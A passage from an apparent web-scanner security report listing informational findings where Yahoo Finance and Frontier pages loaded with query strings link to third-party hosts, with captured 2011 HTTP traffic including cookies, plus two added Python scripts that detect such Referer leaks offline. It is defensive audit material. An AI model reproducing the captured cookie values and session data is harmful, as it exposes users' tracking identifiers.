nit.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_symbol_suggest.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_loader.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_init_symbol_suggest.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/ylc_1.9.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi.js&fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_common.js"></script>

<script type="text/javascript" src="http://l.yimg.com/zz/combo?kx/ucs/common/js/1/setup-min.js&kx/ucs/sts/js/83/skip-min.js&kx/ucs/menu_utils/js/134/menu_utils-min.js&kx/ucs/username/js/33/user_menu-min.js&kx/ucs/help/js/35/help_menu-min.js&kx/ucs/utility_link/js/15/utility_menu-min.js&kx/ucs/common/js/127/logo_debug-min.js&kx/ucs/homepage/js/124/homepage-min.js&kx/ucs/search/js/179/search-min.js"></script>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128ff1cec(gid$PeL0lEPDkjnpARpjTl.wjQIrMhd7ak5mFoYAA903,st$1315313286274929,v$1.0))&t=J_3-D_3"></noscript>
...[SNIP]...
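
Findings 15.54 to 15.61 all come from one check: the page was requested with a query string, and its response references other hosts. The security point is that when the browser follows one of those links, or fetches a cross-domain script, image, frame or stylesheet, the Referer it sends carries the full page URL, query string included, to the third party. The script below is an added example, not code from the report, from Burp Suite or from any of the scanned sites; it reproduces the check offline. It treats any different hostname as "another domain" (an assumption about how the scanner compares hosts) and models the long-standing default browser behaviour, under which the Referer is sent in full except that an https page referencing plain http sends none. The sample HTML is constructed, loosely modelled on finding 15.59, and is not the captured response.

```python
# Added example (not code from the XSS.Cx report or from Burp Suite): a
# stand-alone reproduction of the check behind findings 15.54-15.61,
# "page loaded with a query string references other domains". When the
# browser follows such a link or fetches such a resource, the Referer it
# sends carries the full page URL, query string included, to the other host.
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# (tag, attribute) pairs the browser navigates to or fetches, with a Referer.
URL_ATTRS = {
    ("a", "href"), ("link", "href"), ("script", "src"),
    ("img", "src"), ("iframe", "src"), ("frame", "src"),
}


class _LinkCollector(HTMLParser):
    """Collect every (tag, url) reference in document order."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value and (tag, name) in URL_ATTRS:
                self.links.append((tag, value))


def referer_for(page_url, target_url):
    """Referer a browser attaches when leaving page_url for target_url under
    the long-standing default ('no-referrer-when-downgrade', assumed here):
    the page URL with its fragment dropped and its query string kept, or
    None when an https page references plain http."""
    page, target = urlsplit(page_url), urlsplit(target_url)
    if page.scheme == "https" and target.scheme != "https":
        return None
    return page._replace(fragment="").geturl()


def find_referer_leaks(page_url, body):
    """Reproduce the report's check. Any different hostname counts as
    'another domain' (an assumption about how the scanner compares hosts).
    Returns one record per cross-host reference that would carry the query."""
    page = urlsplit(page_url)
    if not page.query:
        return []                            # no query string, nothing to leak
    collector = _LinkCollector()
    collector.feed(body)
    leaks = []
    for tag, raw in collector.links:
        target = urljoin(page_url, raw)      # resolve relative references
        t = urlsplit(target)
        if t.scheme not in ("http", "https"):
            continue                         # javascript:, mailto:, data: ...
        if not t.hostname or t.hostname == page.hostname:
            continue                         # same host, not cross-domain
        referer = referer_for(page_url, target)
        if referer is not None:
            leaks.append({"tag": tag, "target": target, "referer": referer})
    return leaks


# Constructed sample modelled on finding 15.59 (not the captured response).
SAMPLE_URL = "http://finance.yahoo.com/lookup?s=xss"
SAMPLE_BODY = """
<link rel="stylesheet" href="http://l.yimg.com/bm/combo?fi/some.css">
<script src="/static/local.js"></script>
<a href="http://ad.doubleclick.net/ad/N6036.Yahoo.com/B5653524.6?ord=1">Advertisement</a>
<a href="javascript:void(0)">noop</a>
<img width=1 height=1 src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0">
"""

if __name__ == "__main__":
    for leak in find_referer_leaks(SAMPLE_URL, SAMPLE_BODY):
        print(f"<{leak['tag']}> {leak['target']}  Referer: {leak['referer']}")
```

On the sample, the same-host script and the javascript: link are skipped and the three third-party references are reported, each with the Referer "http://finance.yahoo.com/lookup?s=xss". The practical consequence is the one the report's Information rating implies: a search term such as s=xss is harmless, but a session token or account identifier placed in a query string would reach every ad network and CDN the page embeds.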

15.60. http://finance.yahoo.com/q

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.yahoo.com
Path:   /q

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /q;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--?s=XSS.F HTTP/1.1
Host: finance.yahoo.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/lookup?s=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; finbeta=fp-bkt_o; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:15 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Set-Cookie: PRF=&t=XSS.F; expires=Fri, 03 Sep 2021 05:48:15 GMT; path=/; domain=finance.yahoo.com
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.7
Content-Length: 51214

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>XSS.F: S
...[SNIP]...
<link rel="canonical" href="http://finance.yahoo.com/q?s=XSS.F">
<link rel="stylesheet" href="http://l.yimg.com/bm/lib/fi/common/p/d/static/css/2.0.188908/2.0.0/mini/yfi_quote_summary_concat.css" type="text/css">
</head>
...[SNIP]...
<div id="yfi_hd"><script type='text/javascript' src='http://l.yimg.com/bm/lib/fi/common/p/d/static/js/2.0.188908/2.0.0/yui-min-3.2.0.js'></script><link type='text/css' rel='stylesheet' href='http://l.yimg.com/zz/combo?kx/ucs/uh/css/215/yunivhead-min.css&kx/ucs/uh/css/221/logo-min.css&kx/ucs/search/css/180/search_all-min.css&kx/ucs/search/css/170/search_buttons-min.css' /><style>
...[SNIP]...
</script><script charset='utf-8' type='text/javascript' src='http://l.yimg.com/zz/combo?kx/ucs/common/js/1/setup-min.js&kx/ucs/sts/js/83/skip-min.js&kx/ucs/menu_utils/js/134/menu_utils-min.js&kx/ucs/username/js/33/user_menu-min.js&kx/ucs/help/js/35/help_menu-min.js&kx/ucs/utility_link/js/15/utility_menu-min.js&kx/ucs/common/js/127/logo_debug-min.js&kx/ucs/homepage/js/124/homepage-min.js&kx/ucs/search/js/179/search-min.js'></script>
...[SNIP]...
<span id="yfs_pp0_^dji"><img width="10" height="14" border="0" src="http://l.yimg.com/a/i/us/fi/03rd/down_r.gif" alt="Down"> <b class="
yfi-price-change-down
">
...[SNIP]...
<noscript><link rel="stylesheet" type="text/css" href="http://l.yimg.com/bm/lib/fi/common/p/d/static/css/2.0.188908/2.0.0/yfi_nav_topnav_noscript.css"></noscript>
...[SNIP]...
</script>

<SCRIPT type="text/javascript" src="http://resource.tcgmsrv.net/tase/js/uac.js"></script><noscript> <iframe src="http://adserver.teracent.net/tase/ad?AdBoxType=49&Partner=305&url=fidelity.yahoo.buttons&inv=yaptenc&taid=1298047689104&CustomQuery=lineid%3D207575051%26position%3D1215986051%26site%3Dfinance.yahoo.com&yud=smpv%3d3%26ed%3d5sKNhYzvryTNPuv3gspQXPvZcE4mLfW3Jn_37SuIx8txQGB3ozBXXtL8U2c-&rnd=1315313295276686&esc=0&rcu=http://global.ard.yahoo.com/SIG=15s93v5fj/M=601846039.602985816.859733051.826566051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=vYbXoUPDkjjpARpjTl.wjQKFMhd7ak5mFo8AAr9_/B=DIEoQ9BDRvY-/J=1315313295276686/K=kYjDTKuicqWfKJal7_1uqQ/A=3692525337737555437/R=1/X=3/*" align="center" allowtransparency="true" frameborder="0" hspace="0" marginheight="0" marginwidth="0" scrolling="no" style="border:none;display:block;height:[REPLACE WITH HEIGHT]px;margin:0;padding:0;width:[REPLACE WITH WIDTH]px;" vspace="0"></iframe>
...[SNIP]...
<!-- APT Vendor: Doubleclick -->
<IFRAME SRC="http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15si3pdps/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=vYbXoUPDkjjpARpjTl.wjQKFMhd7ak5mFo8AAr9_/B=CoEoQ9BDRvY-/J=1315313295276686/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*;ord=1315313295276686?" WIDTH=120 HEIGHT=60 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6067.160910.7443114402621/B5129127.36;abr=!ie;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15si3pdps/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=vYbXoUPDkjjpARpjTl.wjQKFMhd7ak5mFo8AAr9_/B=CoEoQ9BDRvY-/J=1315313295276686/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=2/X=3/*;ord=1315313295276686?"></SCRIPT>
...[SNIP]...
295276686/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=0/X=3/SIG=13pvbri05/*http://ad.doubleclick.net/jump/N6067.160910.7443114402621/B5129127.36;abr=!ie4;abr=!ie5;sz=120x60;ord=1315313295276686?"><IMG SRC="http://ad.doubleclick.net/ad/N6067.160910.7443114402621/B5129127.36;abr=!ie4;abr=!ie5;sz=120x60;ord=1315313295276686?" BORDER=0 WIDTH=120 HEIGHT=60 ALT="Advertisement"></A>
...[SNIP]...
<span id="yfs_ad_n4FB2" ><iframe style="padding:0px;margin:0px;" src="http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/68.0.iframe.120x60/1315313295276686?yud=smpv%3d3%26ed%3dKfb2BHkzcaa_Ez5Am4dvC37N1raRCR5h1JWlV.d5tpky0b8xMSZkytDAsrQiWlFiRI7KrmsgZd3dnvnG&encver=1&encalgo=3DES-CFB-SHA1&app=apt&intf=1&click=http://global.ard.yahoo.com/SIG=15sf870iv/M=601843023.602979803.858295551.826566051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=vYbXoUPDkjjpARpjTl.wjQKFMhd7ak5mFo8AAr9_/B=C4EoQ9BDRvY-/J=1315313295276686/K=kYjDTKuicqWfKJal7_1uqQ/A=3686351322249551559/R=0/X=3/*" title="" border="0" frameBorder="0" scrolling="no" width="120" height="60"></iframe>
...[SNIP]...
<span class="fb-like-button"><iframe src="http://www.facebook.com/plugins/like.php?href=http://finance.yahoo.com%2Fq%3Fs%3DXSS.F&amp;layout=button_count&amp;show_faces=false&amp;action=like&amp;font=arial&amp;colorscheme=light&amp;height=21&amp;width=100&amp;locale=en_US" scrolling="no" frameborder="0" allowTransparency="true" style="height:21px; width:95px;"></iframe><a style="padding-top:4px; position:absolute;" href="http://help.yahoo.com/l/us/yahoo/finance/social/fitalikeit.html" title="What is a like button?"><img src="http://l.yimg.com/bm/lib/fi/common/p/d/static/images/2.0.188908/2.0.0/icon_help.gif" alt="What is a like button?"></a>
...[SNIP]...
<td align="right"><a target="_blank" class="CAN_link" href="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0OWRiZTdvMyhnaWQkdlliWG9VUERrampwQVJwalRsLndqUUtGTWhkN2FrNW1GbzhBQXI5XyxzdCQxMzE1MzEzMjk1MjE0ODE1LHNpJDQ0NTEwNTEsdiQxLjAsYWlkJDlyWkZPVVBEbjJvLSxjdCQyNSx5YngkXzBYYWFWLmFEYTZmYW8zQjc4UDA1USx3JDApKQ/2/*http://info.yahoo.com/relevantads/"><span class="can_ad_slug">
...[SNIP]...
<!-- APT Vendor: WSOD -->
<iframe style="padding:0px;margin:0px;" src="http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/104.0.iframe.300x250/1315313295.265601?click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bTE4bmprbyhnaWQkdlliWG9VUERrampwQVJwalRsLndqUUtGTWhkN2FrNW1GbzhBQXI5XyxzdCQxMzE1MzEzMjk1MjE0ODE1LHNpJDQ0NTEwNTEsdiQxLjAsYWlkJDlyWkZPVVBEbjJvLSxjdCQyNSx5YngkXzBYYWFWLmFEYTZmYW8zQjc4UDA1USxyJDAscmQkMTZpMGlmODNnKSk/1/*http://global.ard.yahoo.com/SIG=15h333g9c/M=999999.999999.999999.999999/D=fin/S=95993639:LREC/Y=YAHOO/EXP=1315320495/L=vYbXoUPDkjjpARpjTl.wjQKFMhd7ak5mFo8AAr9_/B=9rZFOUPDn2o-/J=1315313295265601/K=kYjDTKuicqWfKJal7_1uqQ/A=3861873750735285092/R=0/X=6/*" title="" border="0" frameBorder="0" scrolling="no" width="300" height="250"></iframe>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128pp4qhv(gid$vYbXoUPDkjjpARpjTl.wjQKFMhd7ak5mFo8AAr9_,st$1315313295214815,v$1.0))&t=J_3-D_3&al=(as$12c1a0iu0,aid$9rZFOUPDn2o-,bi$933208051,ct$25,at$H)"></noscript>
...[SNIP]...
<p>Fundamental company data provided by <a href="http://www.capitaliq.com">Capital IQ</a>. Historical chart data and daily updates provided by <a href="http://www.csidata.com">Commodity Systems, Inc. (CSI)</a>. International historical chart data, daily updates, fund summary, fund performance, dividend data and Morningstar Index data provided by <a href="http://www.morningstar.com/">Morningstar, Inc.</a> Real-Time quotes provided by <a href="http://batstrading.com">BATS Exchange</a>. Financials data provided by <a href="http://www.edgar-online.com/">Edgar Online</a>. International historical chart data, daily updates, fundAnalyst estimates data provided by <a href="http://thomsonreuters.com/">Thomson Financial Network</a>
...[SNIP]...
</div>
<link type="text/css" rel="stylesheet" href="http://l.yimg.com/bm/combo?fi/common/p/d/static/css/2.0.188908/2.0.0/mini/yfi_symbol_suggest.css&amp;fi/common/p/d/static/css/2.0.188908/2.0.0/mini/yui_helper.css"><div id="spaceid" style="display:none;">
...[SNIP]...
</script><script type="text/javascript" src="http://l.yimg.com/bm/combo?fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/yuiloader-dom-event/2.0.0/mini/yuiloader-dom-event.js&amp;fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/container/2.0.0/mini/container.js&amp;fi/common/p/d/static/js/2.0.188908/2.0.0/mini/ylc_1.9.js&amp;fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_loader.js&amp;fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_symbol_suggest.js&amp;fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_init_symbol_suggest.js&amp;fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_nav_topnav_init.js&amp;fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_nav_topnav.js"></script>
...[SNIP]...
<input type="hidden" id=".yficrumb" name=".yficrumb" value=""><script type="text/javascript" src="http://l.yimg.com/bm/combo?fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfs_concat.js&amp;fi/common/p/d/static/js/2.0.188908/translations/2.0.0/mini/yfs_l10n_en-US.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://l.yimg.com/bm/combo?fi/common/p/d/static/js/2.0.188908/yui_2.8.0/build/cookie/2.0.0/mini/cookie-min.js&amp;fi/common/p/d/static/js/2.0.188908/2.0.0/mini/yfi_ticker_concat.js"></script>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128pp4qhv(gid$vYbXoUPDkjjpARpjTl.wjQKFMhd7ak5mFo8AAr9_,st$1315313295214815,v$1.0))&t=J_3-D_3"></noscript>
...[SNIP]...

15.61. http://frontier.com/winwin1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://frontier.com
Path:   /winwin1

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:50:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 51858


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
</title><link rel="icon" href="http://images.frontiernet.net/favicon.ico" type="image/ico" /><link rel="shortcut icon" href="http://images.frontiernet.net/favicon.ico" />

<!-- Agent Ordering Begin -->
...[SNIP]...
<li><a href="http://frontier.my.yahoo.com/">Frontier My Yahoo!</a>
...[SNIP]...
<div id="offer-service1" class="offer-service"><a href="http://www.fbscenter.com/Content/BusinessHighSpeedInternet.pdf" target="_blank"><img alt="High-Speed Internet" src="/Images/2011promo/icon-red-internet.jpg" width="234" height="134" />
...[SNIP]...
<div id="offer-service2" class="offer-service"><a href="http://www.fbscenter.com/Content/BusinessVoiceSolutions.pdf" target="_blank"><img alt="Voice" src="/Images/2011promo/icon-red-voice.jpg" width="234" height="134" />
...[SNIP]...
<div id="offer-service3" class="offer-service"><a href="http://www.fbscenter.com/Content/PeaceOfMind.pdf" target="_blank"><img alt="Back Up &amp; Recovery" src="/Images/2011promo/icon-red-backup-recovery.jpg" width="234" height="134" />
...[SNIP]...
<br /><a href="http://www.facebook.com/FrontierCorp" target="_blank"><img alt="Facebook" src="/Images/2011promo/logo-facebook.gif" width="29" height="28" /></a> <a href="http://twitter.com/frontiercorp" target="_blank"><img alt="Twitter" src="/Images/2011promo/logo-twitter.gif" width="29" height="28" /></a> <a href="http://www.linkedin.com/company/frontier-communications" target="_blank"><img alt="LinkdIn" src="/Images/2011promo/logo-linkedin.gif" width="29" height="28" />
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ftr.www.frontier.com/generic.footer;tile=1;sz=728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/ftr.www.frontier.com/generic.footer;tile=1;sz=728x90;ord=123456789?" border="0" alt="" /></a>
...[SNIP]...
<li><a class="CheckForRegion" href="http://www.frontierhelp.com/techsupport">Technical
Support</a>
...[SNIP]...
<li><a class="CheckForRegion" href="https://frontier.globysonline.com/cv/scripts/ABE0/eng/log.asp?gru=437662910&amp;sec=">
Business Online Bill Pay</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/phoenix.zhtml?c=66508&amp;p=irol-irhome">Investor
Relations</a>
...[SNIP]...
<li><a href="http://phx.corporate-ir.net/phoenix.zhtml?c=66508&amp;p=irol-news&amp;nyo=0">
Press Room</a>
...[SNIP]...
<li><a href="http://carrier.frontiercorp.com/crtf/tariffs/index.cfm?fuseaction=main&amp;sctnID=19">
Tariffs</a>
...[SNIP]...
<noscript><img src="http://citizenstelecom.112.2o7.net/b/ss/cznfrontier/1/H.22.1--NS/0"
height="1" width="1" border="0" alt="" />
</noscript>
...[SNIP]...
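Every entry in this section reports the same condition: the request URL carries parameters, and the response body links (through href or src attributes) to hosts outside the requested site, so that when the browser follows one of those links the parameter values can travel to the third party in the Referer header. The check below is an added example written for this page, not part of the XSS.Cx scanner output, and reproduces that test offline: it parses a response body for href/src targets and reports those whose registrable domain differs from the request host. The sample request URLs and bodies are constructed from the 15.61 and 15.67 excerpts rather than captured traffic; the two-label registrable-domain rule is an assumption (no public-suffix list), and the check only looks at the `?` query, so entries such as 15.63 that carry their parameters in the path would need the path treated as parameters as well.

```python
"""Offline check for cross-domain links in the response to a parameterised request.

Added example for this report; not part of the scanner output. The sample
inputs below are constructed from the 15.61 and 15.67 excerpts, not captured.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit


class _LinkExtractor(HTMLParser):
    """Collect every href/src attribute value the parser sees. HTMLParser is
    lenient enough to pick up tags that only exist inside JavaScript string
    literals, e.g. document.write('<img src="...">') as in entry 15.67."""

    WATCHED = ("href", "src")

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.lower() in self.WATCHED and value:
                self.links.append(value)


def registrable_domain(host):
    """Assumption: the registrable domain is the last two labels. Adequate for
    the .com/.net hosts on this page; a real tool should use the public-suffix
    list so that e.g. example.co.uk is not collapsed to co.uk."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else labels[0]


def cross_domain_links(request_url, response_body):
    """Return the sorted, de-duplicated links in response_body whose registrable
    domain differs from the request host. Returns [] when the request carries no
    query string, since then there are no parameter values to leak via Referer.
    Relative links and values without an http(s) scheme, such as the unexpanded
    ${SEG_IDS} placeholder in entry 15.67, are ignored."""
    req = urlsplit(request_url)
    if not req.query or not req.hostname:
        return []
    parser = _LinkExtractor()
    parser.feed(response_body)
    parser.close()
    own = registrable_domain(req.hostname)
    found = set()
    for link in parser.links:
        target = urlsplit(link)
        if target.scheme not in ("http", "https") or not target.hostname:
            continue
        if registrable_domain(target.hostname) != own:
            found.add(link)
    return sorted(found)


# Constructed sample modelled on entry 15.61 (HTML page with a query string).
SAMPLE_HTML_REQUEST = "http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110"
SAMPLE_HTML_BODY = """<html><head>
<link rel="icon" href="http://images.frontiernet.net/favicon.ico" type="image/ico" />
</head><body>
<a href="http://www.fbscenter.com/Content/BusinessHighSpeedInternet.pdf" target="_blank">
<img alt="High-Speed Internet" src="/Images/2011promo/icon-red-internet.jpg" /></a>
<a href="http://www.frontier.com/">Home</a>
</body></html>"""

# Constructed sample modelled on entry 15.67 (JavaScript that document.write()s tags).
SAMPLE_JS_REQUEST = "http://ib.adnxs.com/seg?add=155746&redir=${SEG_IDS}&t=1"
SAMPLE_JS_BODY = (
    "document.write('<img src=\"http://tags.bluekai.com/site/4378\" width=\"1\" height=\"1\"/>');"
    "document.write('<scr'+'ipt type=\"text/javascript\" src=\"${SEG_IDS}\">');"
)


if __name__ == "__main__":
    for url, body in ((SAMPLE_HTML_REQUEST, SAMPLE_HTML_BODY), (SAMPLE_JS_REQUEST, SAMPLE_JS_BODY)):
        print(url)
        for link in cross_domain_links(url, body):
            print("  ->", link)
```

On the 15.61-style sample the check reports the favicon on images.frontiernet.net and the PDF on www.fbscenter.com, but not the relative image or the www.frontier.com link, which shares the request's registrable domain; on the 15.67-style sample it reports the bluekai pixel and skips the `${SEG_IDS}` value because it has no scheme. Dropping the query string from the request URL yields no findings, which matches the scanner's own precondition.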

15.62. http://games.frontier.com/game.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://games.frontier.com
Path:   /game.htm

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; the relevant lines are shown in the response excerpt below.

Request

GET /game.htm?code=119282623&lc=en&channel=110464377 HTTP/1.1
Host: games.frontier.com
Proxy-Connection: keep-alive
Referer: http://games.frontier.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=oberonfrontier%3D%2526pid%253DhomePage%2526pidt%253D1%2526oid%253Dhttp%25253A//games.frontier.com/game.htm%25253Fcode%25253D119282623%252526lc%25253Den%252526channel%25253D110464377%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 91941
Cache-Control: private, max-age=0
Expires: Tue, 06 Sep 2011 12:50:48 GMT
Date: Tue, 06 Sep 2011 12:50:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ober.frontier/product_' + pcode +';dc_seed=' + adid +';tile=2;sz=300x250;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ober.frontier/product_' + pcode +';dc_seed=' + adid +';tile=2;sz=300x250;ord=123456789?" width="300" height="250" border="0" alt=""></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ober.frontier/product_' + pcode +';dc_seed=' + adid +';tile=3;sz=300x250;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ober.frontier/product_' + pcode +';dc_seed=' + adid +';tile=3;sz=300x250;ord=123456789?" width="300" height="250" border="0" alt=""></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ober.frontier/product_' + pcode +';sz=300x160;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ober.frontier/product_' + pcode +';sz=300x160;ord=123456789?" width="300" height="160" border="0" alt=""></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/ober.frontier/product_' + pcode +';dc_seed=' + adid +';tile=4;sz=728x90;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/ober.frontier/product_' + pcode +';dc_seed=' + adid +';tile=4;sz=728x90;ord=123456789?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
<li><a href="http://frontier.my.yahoo.com/">Frontier My Yahoo!</a>
...[SNIP]...
<li><a href="http://www.frontierhelp.com/frontiercare/">Peace of Mind</a>
...[SNIP]...
</noscript> <a href="http://phx.corporate-ir.net/phoenix.zhtml?c=66508&p=irol-irhome"><b>
...[SNIP]...

15.63. http://global.ard.yahoo.com/SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=s2XyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=6304038/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1542.1206.iframe.120x60/yhdata*ycg=%7Cyyob=%7Czip=,%7Cybt=%7C%7C**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://global.ard.yahoo.com
Path:   /SIG=15lcbbc7c/M=791401.14796848.14552986.4227981/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=s2XyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=6304038/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1542.1206.iframe.120x60/yhdata*ycg=%7Cyyob=%7Czip=,%7Cybt=%7C%7C**

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain; the relevant line is shown in the response excerpt below.

Request

